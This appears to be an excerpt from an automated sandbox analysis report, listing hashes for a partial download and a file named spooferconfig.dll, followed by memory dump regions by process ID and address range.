                                                  • C:\Users\Admin\Downloads\Unconfirmed 793223.crdownload

                                                    Filesize

                                                    6.0MB

                                                    MD5

                                                    f553ad722875c02d5b45f5c975ceb771

                                                    SHA1

                                                    867f41aa5b67cf7e15e3efe6cb4360f8f415fa6e

                                                    SHA256

                                                    35f12093577d9c58fe7858ca26a935aaf409269057a9a8bdf975693d6dfe208a

                                                    SHA512

                                                    041924f9a64d626d1a3b7111de968f11cc08d384b9dcd47e832744bc195d71d6f58bf06cc9f14fcf31a2f1490230779d9a1afd70e8eb836424fd14d59e6f663b

                                                  • C:\Users\Admin\Downloads\spooferconfig.dll:Zone.Identifier

                                                    Filesize

                                                    26B

                                                    MD5

                                                    fbccf14d504b7b2dbcb5a5bda75bd93b

                                                    SHA1

                                                    d59fc84cdd5217c6cf74785703655f78da6b582b

                                                    SHA256

                                                    eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

                                                    SHA512

                                                    aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

                                                  • memory/1484-576-0x00000000071F0000-0x0000000007201000-memory.dmp

                                                    Filesize

                                                    68KB

                                                  • memory/1484-577-0x0000000007230000-0x0000000007245000-memory.dmp

                                                    Filesize

                                                    84KB

                                                  • memory/1484-567-0x00000000708A0000-0x00000000708EC000-memory.dmp

                                                    Filesize

                                                    304KB

                                                  • memory/1484-565-0x0000000005700000-0x0000000005A57000-memory.dmp

                                                    Filesize

                                                    3.3MB

                                                  • memory/3104-607-0x00000000059F0000-0x0000000005D47000-memory.dmp

                                                    Filesize

                                                    3.3MB

                                                  • memory/3104-609-0x00000000708A0000-0x00000000708EC000-memory.dmp

                                                    Filesize

                                                    304KB

                                                  • memory/3400-581-0x0000000002410000-0x0000000002810000-memory.dmp

                                                    Filesize

                                                    4.0MB

                                                  • memory/4292-36-0x00000000708A0000-0x00000000708EC000-memory.dmp

                                                    Filesize

                                                    304KB

                                                  • memory/4292-45-0x0000000007060000-0x000000000707E000-memory.dmp

                                                    Filesize

                                                    120KB

                                                  • memory/4292-58-0x0000000007700000-0x0000000007708000-memory.dmp

                                                    Filesize

                                                    32KB

                                                  • memory/4292-57-0x0000000007710000-0x000000000772A000-memory.dmp

                                                    Filesize

                                                    104KB

                                                  • memory/4292-56-0x0000000007620000-0x0000000007635000-memory.dmp

                                                    Filesize

                                                    84KB

                                                  • memory/4292-55-0x0000000007610000-0x000000000761E000-memory.dmp

                                                    Filesize

                                                    56KB

                                                  • memory/4292-54-0x00000000075E0000-0x00000000075F1000-memory.dmp

                                                    Filesize

                                                    68KB

                                                  • memory/4292-53-0x0000000007650000-0x00000000076E6000-memory.dmp

                                                    Filesize

                                                    600KB

                                                  • memory/4292-52-0x0000000007450000-0x000000000745A000-memory.dmp

                                                    Filesize

                                                    40KB

                                                  • memory/4292-16-0x00000000747CE000-0x00000000747CF000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/4292-51-0x00000000073E0000-0x00000000073FA000-memory.dmp

                                                    Filesize

                                                    104KB

                                                  • memory/4292-17-0x0000000004C40000-0x0000000004C76000-memory.dmp

                                                    Filesize

                                                    216KB

                                                  • memory/4292-49-0x0000000007A10000-0x000000000808A000-memory.dmp

                                                    Filesize

                                                    6.5MB

                                                  • memory/4292-18-0x00000000052B0000-0x00000000058DA000-memory.dmp

                                                    Filesize

                                                    6.2MB

                                                  • memory/4292-46-0x0000000007080000-0x0000000007124000-memory.dmp

                                                    Filesize

                                                    656KB

                                                  • memory/4292-61-0x00000000747C0000-0x0000000074F71000-memory.dmp

                                                    Filesize

                                                    7.7MB

                                                  • memory/4292-35-0x0000000006640000-0x0000000006674000-memory.dmp

                                                    Filesize

                                                    208KB

                                                  • memory/4292-34-0x00000000060A0000-0x00000000060EC000-memory.dmp

                                                    Filesize

                                                    304KB

                                                  • memory/4292-33-0x0000000006070000-0x000000000608E000-memory.dmp

                                                    Filesize

                                                    120KB

                                                  • memory/4292-32-0x0000000005B70000-0x0000000005EC7000-memory.dmp

                                                    Filesize

                                                    3.3MB

                                                  • memory/4292-22-0x00000000058E0000-0x0000000005946000-memory.dmp

                                                    Filesize

                                                    408KB

                                                  • memory/4292-23-0x0000000005B00000-0x0000000005B66000-memory.dmp

                                                    Filesize

                                                    408KB

                                                  • memory/4292-21-0x00000000051C0000-0x00000000051E2000-memory.dmp

                                                    Filesize

                                                    136KB

                                                  • memory/4292-20-0x00000000747C0000-0x0000000074F71000-memory.dmp

                                                    Filesize

                                                    7.7MB

                                                  • memory/4292-19-0x00000000747C0000-0x0000000074F71000-memory.dmp

                                                    Filesize

                                                    7.7MB

                                                  • memory/4408-47-0x0000000000700000-0x0000000000707000-memory.dmp

                                                    Filesize

                                                    28KB

                                                  • memory/4408-50-0x00000000024E0000-0x00000000028E0000-memory.dmp

                                                    Filesize

                                                    4.0MB

                                                  • memory/4408-48-0x00000000024E0000-0x00000000028E0000-memory.dmp

                                                    Filesize

                                                    4.0MB

                                                  • memory/4568-621-0x0000000002100000-0x0000000002500000-memory.dmp

                                                    Filesize

                                                    4.0MB